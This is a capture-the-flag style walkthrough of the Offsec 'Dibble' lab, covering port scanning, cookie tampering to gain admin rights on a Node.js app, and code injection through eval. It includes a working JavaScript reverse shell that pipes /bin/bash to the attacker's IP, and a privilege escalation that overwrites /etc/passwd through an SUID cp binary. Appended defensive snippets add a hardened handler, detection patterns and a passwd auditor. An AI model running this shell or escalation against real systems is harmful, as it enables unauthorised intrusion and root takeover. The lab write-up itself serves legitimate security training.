
Dibble Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Linux
Author: Pawan Kumar (Vulntricks)
Date: 04/07/2025


🛰️ 1. Reconnaissance

Quick Scan using RustScan

We scan with RustScan because it is fast, and pass Nmap's default script scan (-sC) and service detection (-sV) through to it so that they run on the identified ports.

$ rustscan -a $IP -- -sV -sC 

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.249
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 9d:3f:eb:1b:aa:9c:1e:b1:30:9b:23:53:4b:cf:59:75 (RSA)
| 256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK9spPy8kad9kuulG4kX03Wofq8wXe6arLeCb41/Nh7xFMtpRGM6zo7A8U3Vatg7bX20jaU43i7uYZyl7IA5dNA=
| 256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ00KH0CvMHGQmVCsdM6I+93pxC0naR6to6qUq3ZJa4b
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.46 ((Fedora))
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
| /index.php/comment/reply/ /index.php/filter/tips /index.php/node/add/
| /index.php/search/ /index.php/user/password/ /index.php/user/register/
|_/index.php/user/login/ /index.php/user/logout/
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: Home | Hacking Articles
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 9 (https://www.drupal.org)
|_http-server-header: Apache/2.4.46 (Fedora)
3000/tcp open http syn-ack ttl 61 Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
27017/tcp open mongodb syn-ack ttl 61 MongoDB 4.2.9 4.2.9
| mongodb-info:
| MongoDB Build info
| maxBsonObjectSize = 16777216
| sysInfo = deprecated
| versionArray
| 0 = 4
| 3 = 0
| 2 = 9
| 1 = 2
| ok = 1.0
| gitVersion = 06402114114ffc5146fd4b55402c96f1dc9ec4b5
| openssl
| compiled = OpenSSL 1.0.1e-fips 11 Feb 2013
| running = OpenSSL 1.0.1e-fips 11 Feb 2013
| allocator = tcmalloc
| storageEngines
| 0 = biggie
| 3 = wiredTiger
| 2 = ephemeralForTest
| 1 = devnull
| version = 4.2.9
| debug = false
| buildEnvironment
| distarch = x86_64
| cc = /opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.2.0
| ccflags = -fno-omit-frame-pointer -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -Werror -O2 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -fno-builtin-memcmp
| target_os = linux
| cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.2.0
| distmod = rhel70
| target_arch = x86_64
| cxxflags = -Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17
| linkflags = -pthread -Wl,-z,now -rdynamic -Wl,--fatal-warnings -fstack-protector-strong -fuse-ld=gold -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro
| javascriptEngine = mozjs

Enumeration

Enumerating port 21

Starting with anonymous login.

└─$ ftp -A anonymous@$IP   
Connected to 192.168.238.110.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.

Nothing found

Enumerating port 3000

According to the lab description, the entry point is the Node.js website, and the scan makes it clear that this is the Express service on port 3000.

Let's enumerate it then, starting with a look at the website.


We see a login portal, so we can create a user (test1:test1).

Creating the user gives us a cookie.

When I log in I also see a user level in the cookie.

So when I decode it as base64 I get the value default.

There is a possibility that, if this is a default user, we can change it to admin and perform the tasks only allowed for admins. We'll note this and continue our enumeration.

I tried to log an event, however I could not, as only admins can log events.

We can try to modify the cookie value in Burp and see if we can bypass this restriction.

I did it in the Repeater of Burp Suite, changed the user level value to admin, and I was able to write the logs.

Now what! 🥲 Can I put in some malicious script? Can I do any malicious activity?

Tried creating a webshell using the Node.js command but failed; however, upon looking for that file I get an error.

The error clearly displays a username, benjamin.


Initial Access

Now I found something interesting: putting 2*2 in the message box gives 4 in the response, so the input is basically being executed. This suggests JavaScript is evaluating it on the backend.

So we can try putting some JavaScript in to test the theory.

Found this command for a reverse shell in JS. Initially I tried with port 4444 and it failed, so I changed it to an open port in the system, which is port 21, and it worked.

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(21, "192.168.45.249", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
})();

Got a reverse shell.
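Why 2*2 came back as 4, as an added example that is not the lab's code: a handler that passes the event message to eval() beside a hardened one that stores it as plain text, plus a small review helper for spotting injected code in stored events. The function names, the length limit and the sample events are constructed.

```javascript
// VULNERABLE: the event message is handed to eval(), so "2*2" returns 4 and any
// other JavaScript in the message runs with the privileges of the Node.js process.
function logEventVulnerable(message) {
  return String(eval(message));
}

// Hardened: the message is validated as plain text and stored as data only;
// nothing evaluates, templates or interpolates it.
const MAX_LEN = 200; // assumption: application-specific limit
function logEventHardened(message) {
  if (typeof message !== "string") throw new TypeError("message must be a string");
  if (message.length === 0 || message.length > MAX_LEN) throw new RangeError("bad message length");
  return message;
}

// Review helper: scan stored event messages for Node.js execution primitives
// so a log full of injected code stands out during incident review.
const SUSPICIOUS = [/\brequire\s*\(/, /child_process/, /\bprocess\.(env|binding)\b/, /\bnet\.Socket\b/];
function flagSuspiciousEvents(events) {
  return events.filter(e => SUSPICIOUS.some(re => re.test(String(e.message))));
}

// Constructed sample log entries for the review helper.
const sampleEvents = [
  { id: 1, message: "backup completed" },
  { id: 2, message: "2*2" },
  { id: 3, message: 'require("child_process")' },
];
```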


Privilege Escalation

Running linpeas on the machine gives some information, but it specifically highlights the cp command.


Let's try to abuse this SUID binary.

Looking in GTFOBins, I see that we can use this command to write to files.

We can try to create a new user and write it into the passwd file.

Copy the passwd file locally to the home directory or any other directory.

Create a password hash using the openssl command.

Make a new user entry and paste it into the copied passwd file.

We copied our crafted passwd file over /etc/passwd using the SUID cp command.

Elevated our privilege.
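A check a defender would run for the passwd technique used above, as an added example that is not the lab's code: it parses passwd text and reports any second UID 0 account and any entry with a password hash stored inline instead of in shadow. The sample passwd content and the pwned user are constructed; a real check would read /etc/passwd.

```javascript
// Parse passwd-format text into records; blank lines and comments are skipped.
function parsePasswd(text) {
  return text.split("\n").filter(l => l && !l.startsWith("#")).map(line => {
    const [name, pass, uid, gid, gecos, home, shell] = line.split(":");
    return { name, pass, uid: Number(uid), gid: Number(gid), gecos, home, shell };
  });
}

// Report the two conditions the SUID cp escalation leaves behind: an extra
// UID 0 account and a hash in the password field (normally "x" with the hash in shadow).
function auditPasswd(text) {
  const findings = [];
  for (const e of parsePasswd(text)) {
    if (e.uid === 0 && e.name !== "root")
      findings.push({ user: e.name, issue: "uid 0 account other than root" });
    if (!["x", "*", "!", ""].includes(e.pass))
      findings.push({ user: e.name, issue: "password hash stored in passwd instead of shadow" });
  }
  return findings;
}

// Constructed sample: a normal system plus one injected entry.
const samplePasswd = [
  "root:x:0:0:root:/root:/bin/bash",
  "benjamin:x:1000:1000::/home/benjamin:/bin/bash",
  "pwned:$1$examplesalt$exampleHashValue:0:0::/root:/bin/bash", // placeholder hash
].join("\n");
```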